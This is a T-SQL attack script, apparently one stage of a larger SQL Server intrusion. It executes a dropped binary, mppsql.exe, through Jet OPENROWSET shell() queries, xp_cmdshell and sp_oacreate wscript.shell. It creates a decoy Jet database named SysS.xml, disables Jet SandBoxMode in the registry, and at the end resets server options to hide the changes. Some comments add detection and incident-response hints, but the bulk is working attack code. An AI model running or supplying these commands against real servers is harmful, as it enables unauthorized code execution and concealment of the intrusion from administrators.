Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("c:\winnt\system32\mppsql.exe")');
go
exec master..xp_cmdshell "c:\windows\system32\mppsql.exe"
go
exec master..xp_cmdshell "mppsql.exe"
go
exec master..xp_cmdshell "c:\winnt\system32\mppsql.exe"
go
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c mppsql.exe'
go
go
-- Jet route without relying on a pre-existing .mdb file: an ADOX.Catalog object
-- is created and its Create method is called with a Jet connection string whose
-- Data Source is SysS.xml, after which OPENROWSET names SysS.xml as the database
-- for the shell() queries. The block ends by writing SandBoxMode = 0 and running
-- the ias.mdb variants again for both the \windows and \winnt layouts.
-- Detection: a file named SysS.xml created by the SQL Server service account —
-- the extension says XML while the creating provider is Jet; OPENROWSET
-- statements whose provider is Microsoft.Jet.OLEDB.4.0 and whose query text
-- contains shell(.
declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysS.xml'
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("mppsql.exe")')
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("c:\windows\system32\mppsql.exe")')
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("c:\winnt\system32\mppsql.exe")')
go
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\mppsql.exe")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("c:\winnt\system32\mppsql.exe")');
go
-- Clean-up: both server options enabled near the top of the page are set back to
-- 0 and applied with RECONFIGURE, so the instance's configuration looks unchanged
-- afterwards. The extended-procedure registrations, the registry value, the
-- copied binaries and the dropped files are not reverted by anything on this
-- page.
-- Incident response: after seeing this script, do not rely on current
-- sp_configure values. Review the error log for configuration-change entries,
-- compare registered extended procedures to a baseline, check the SandBoxMode
-- value, and sweep for the file names used in the earlier stages.
exec sp_configure 'Ad Hoc Distributed Queries',0
reconfigure
exec sp_configure 'show advanced options',0
reconfigure